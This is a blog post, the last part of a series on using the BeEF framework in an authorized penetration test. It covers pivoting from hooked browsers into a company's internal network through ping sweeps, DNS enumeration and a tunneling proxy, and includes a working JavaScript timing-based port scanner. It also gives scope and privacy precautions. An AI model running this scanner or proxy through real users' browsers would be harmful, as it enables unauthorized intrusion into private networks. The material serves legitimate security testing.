Saturday, June 23, 2012

BeEF In a Real World Pen Test - Part 4: BeEFy Desserts

Welcome to the final installment of BeEF in a real world pentest.

You can read the previous installments in our blog.

But, to recap: in Part 1, we demonstrated how to build the con for our fictional target company Contoso. In Part 2, we set the hooks for our targets and got zombies on the line. In Part 3, we gathered information from our hooked targets and started exploiting that data.

In this episode, we discuss how to pivot from the hooked browsers further into the internal network, and how to keep the engagement clean and professional within the agreed scope and time frame.

Based on our previous work, we have a slew of hooked browsers and have penetrated the first layer of defenses. At this point, we want to use those hooked browsers to pivot and hop inside the network.

Hopping Inside

We start off by identifying the hosts on the same network as the hooked browser. Since we already have the browser’s internal IP (see Part 3), we sweep its /24 (class C) with the ping sweep modules: for Firefox, the “network/Ping Sweep” module, which requires no user interaction; for other browsers, “network/Ping Sweep Java”, which relies on a Java applet and so may prompt the user.

Additionally, we fingerprint common appliances on the hooked browser’s network with the “network/Internal Network Fingerprinting” module. It probes a list of default IP addresses for resources (images and similar files) at paths that are known signatures of printers, routers, media servers and so on, and reports which ones load.

After we have identified some live IPs, we scan them for open ports. Using the “network/Port Scanner” module (Firefox and Chrome only), we can port scan internal IPs from the hooked browser. The module infers port state from connection timing using WebSockets and other HTML5 techniques (cross-origin requests and image loads).

To further investigate our internal targets, we can run a DNS enumeration scan on the internal network with the “network/DNS Enumeration” module. It applies the same timing trick to hostnames: a wordlist of common internal names (intranet, mail, print, etc.) is resolved from the hooked browser, and the time it takes for a request to fail distinguishes names that exist from those that do not. This is very helpful in identifying internal resources.
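The timing technique behind the ping sweep and port scanner modules above, as an added example rather than BeEF’s own module code. The page cannot read a cross-origin response, but it can measure how long the browser takes to give up on a connection attempt; the thresholds, the probe and scheduler names, and the sample timings are this example’s own assumptions (the timings are constructed, not measured):

```javascript
// Added example (not BeEF's own module code): timing-based port scanning from a
// hooked browser, and host discovery as the same probe against a single port.
//   closed   -> TCP RST comes straight back, the error event fires within a few ms
//   open     -> handshake succeeds; the browser then waits for an HTTP reply until
//               the service answers or closes, which takes noticeably longer
//   filtered -> the SYN is dropped; nothing fires until our own timeout
// Thresholds are assumptions for a LAN; calibrate against a known-closed port.

const CLOSED_MAX_MS = 100;        // assumption: RST-driven errors land under this
const DEFAULT_TIMEOUT_MS = 3000;  // assumption: give up on silent ports after this

// Classify one timed observation { outcome: 'load'|'error'|'timeout', elapsedMs }.
function classify(sample) {
  if (sample.outcome === 'load') return 'open';             // something served an image
  if (sample.outcome === 'timeout') return 'open|filtered'; // silent: dropped or slow
  return sample.elapsedMs < CLOSED_MAX_MS ? 'closed' : 'open';
}

// Host discovery: any answer at all (even a fast RST) means the host is up;
// only a dead or firewalled host produces no event before the timeout.
function hostAlive(sample) {
  return sample.outcome !== 'timeout';
}

// Browser-only probe: request an <img> from http://host:port/ and time the outcome.
function probeWithImage(host, port, timeoutMs = DEFAULT_TIMEOUT_MS) {
  return new Promise((resolve) => {
    const started = Date.now();
    let settled = false;
    const img = new Image();
    const finish = (outcome) => {
      if (settled) return;
      settled = true;
      clearTimeout(timer);
      img.onload = img.onerror = null;
      resolve({ host, port, outcome, elapsedMs: Date.now() - started });
    };
    const timer = setTimeout(() => finish('timeout'), timeoutMs);
    img.onload = () => finish('load');
    img.onerror = () => finish('error');
    img.src = `http://${host}:${port}/${started}.png`; // unique path defeats caching
  });
}

// Scan a list of ports with a bounded number of in-flight probes. `probe` is
// injected so the same scheduler runs in a browser (probeWithImage) or offline
// against recorded timings (makeFakeProbe below). Browsers cap connections per
// host (around six), so a larger concurrency only queues inside the browser.
async function scanPorts(host, ports, probe, concurrency = 4) {
  const queue = ports.slice();
  const results = {};
  async function worker() {
    while (queue.length) {
      const port = queue.shift();
      results[port] = classify(await probe(host, port));
    }
  }
  await Promise.all(Array.from({ length: concurrency }, worker));
  return results;
}

// Offline stand-in for probeWithImage: constructed timings keyed by port.
function makeFakeProbe(table) {
  return (host, port) => new Promise((resolve) =>
    setTimeout(() => resolve({ host, port, ...(table[port] || { outcome: 'error', elapsedMs: 2 }) }), 0));
}

// Constructed sample timings (not real measurements) for a hypothetical 10.0.0.5.
const CONSTRUCTED_TIMINGS = {
  80:   { outcome: 'error',   elapsedMs: 410 },                // web server: HTML is not an image
  445:  { outcome: 'error',   elapsedMs: 3 },                  // RST straight back
  3389: { outcome: 'timeout', elapsedMs: DEFAULT_TIMEOUT_MS }, // silent, dropped or slow
  8080: { outcome: 'load',    elapsedMs: 120 },                // served something loadable
};

if (typeof Image === 'undefined') {
  // Not in a browser: run against the constructed table to show the output shape.
  scanPorts('10.0.0.5', [80, 445, 3389, 8080], makeFakeProbe(CONSTRUCTED_TIMINGS))
    .then((results) => console.log(results));
}
```

Two practical caveats when reading the results: browsers refuse to connect to a built-in list of “unsafe” ports (22, 23, 25, 110 and 143 among them) and report those as an instant error, indistinguishable from closed, so they cannot be scanned this way; and the closed threshold should be calibrated per hooked browser by probing a port you know is closed, since VPN or Wi-Fi latency can push an RST past 100 ms.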

Now that we have a good understanding of the internal network, the last step is to scan internal applications for further vulnerabilities. Using the “Tunneling Proxy” extension, we chain our own browser, a web vulnerability scanner such as Burp Suite and the hooked browser into a proxy chain, so that the scanner’s requests are issued from the hooked browser inside the target network, with the victim’s cookies. Because those requests are sent with XMLHttpRequest from the hooked page, the same-origin policy still applies: responses are readable only for the origin the browser is hooked on (or origins that explicitly allow it via CORS). A video by Michele “antisnatchor” Orru best describes how this is set up.

We can also craft and send raw requests through a hooked browser from the Rider extension tab, which lets us run more elaborate attacks against the internal web servers under the same origin constraints.

It is worth mentioning that we can pivot and hop further by leveraging the Meterpreter shells we already have on some low-value hosts and on the compromised test server (see Part 3), but that is beyond the scope of this text.


Now that we have fully penetrated our target, here are some tips that help keep the pen test clean and professional.

The first thing to take care of is preventing backfire from disgruntled employees and/or the target’s sysadmins. The last thing we want is to get hacked by our customers! To secure our own perimeter, we take a few precautions:
  • Limit the BeEF admin UI to the internal IPs we actually use to administer BeEF. This is done in the main config.yaml by setting “permitted_ui_subnet” to the administration subnet.
  • Set up firewall rules on the BeEF server that block all external access except the web port the hook is served on (3000 by default), the Metasploit payload delivery port and the browser autopwn port (if applicable).

For large numbers of hooked browsers, the performance of the default database driver (SQLite) drops dramatically, sometimes leading to unexpected behaviour. If you plan on hooking many browsers, run BeEF in MySQL mode, configured under the “database: driver:” section of config.yaml. Changing the update timeout in updates.js to 1-2 seconds (depending on connection speed) might also give a performance boost, since each hooked browser polls the server on that interval.

It goes without saying that we need written authorization for the penetration test. What is sometimes missing are the small details that cause problems later. The following are examples of sensitive “grey” interactions that should be explicitly declared in the scope and agreed upon a priori:
  • Sending phishing emails that are likely to cause a stir (especially to or about C-level executives).
  • Capturing employees’ personal information and using it to gain access to their corporate machines.
  • Extracting wireless keys from corporate machines, given that laptops and BYOD-style devices may also hold personal wireless keys.

To keep the pen test from creeping onto personal ground, we take some more precautions:
  • Limit the hooking subnets to the target company’s IP ranges, to prevent accidental or out-of-scope hooking of browsers. This severely limits the hooking of smartphones, however, as they will most likely be hooked over their 3G/4G interface rather than the corporate network.
  • Limit hooking to browsers arriving with one of a predefined set of referrer URLs that we control. This is a weak control, since the referrer can be absent or spoofed, but it can be handy for mobile devices.
  • Do not save exported wireless keys that do not belong to the corporate wireless.
  • Do not save or use private photos and/or videos exported from users’ profiles or harvested in the recon phase; this is not corporate related and probably off limits.
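The configuration side of the three BeEF settings mentioned above (admin UI subnet, database driver and hooking subnet), as an added example rather than text from the original post. The key names follow the config.yaml of this BeEF era; the CIDR ranges, database credentials and the keys below “driver:” are assumptions to be checked against the config.yaml shipped with your copy, and the defaults quoted in the comments are the permissive values that a fresh install carries:

```yaml
# config.yaml fragment (added example). Each hardened value is shown in place,
# with the permissive default noted in the comment above it.
beef:
    restrictions:
        # default "0.0.0.0/0": any browser that loads hook.js gets hooked,
        # in or out of scope. Assumed client range; note that smartphones on
        # 3G/4G will fall outside it and will not be hooked.
        permitted_hooking_subnet: "203.0.113.0/24"
        # default "0.0.0.0/0": the admin UI answers to the whole internet.
        # Assumed management VPN subnet used by the testers only.
        permitted_ui_subnet: "10.8.0.0/24"
    database:
        # default "sqlite" with db_file "db/beef.db"; fine for a handful of
        # zombies, degrades badly with hundreds.
        driver: "mysql"
        # assumed MySQL settings; keep the database on the BeEF host or a
        # private interface so the firewall rules above still hold
        db_host: "127.0.0.1"
        db_port: 3306
        db_name: "beef"
        db_user: "beef"
        db_passwd: "change-me-before-the-engagement"
```

Both restrictions are enforced on the source address BeEF sees, so they only help if BeEF is reached directly rather than through a reverse proxy that rewrites the client address.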

Now that we have successfully penetrated the perimeter, hopped inside the internal network, and secured ourselves against backfire and scope creep, we are ready to write the report, focusing on how our client can fix the issues through which we were able to gain this access.

Special thanks to Heather Pilkington for helping me out throughout this series, Michele Orru for his insightful comments, and the whole BeEF team for their great support!
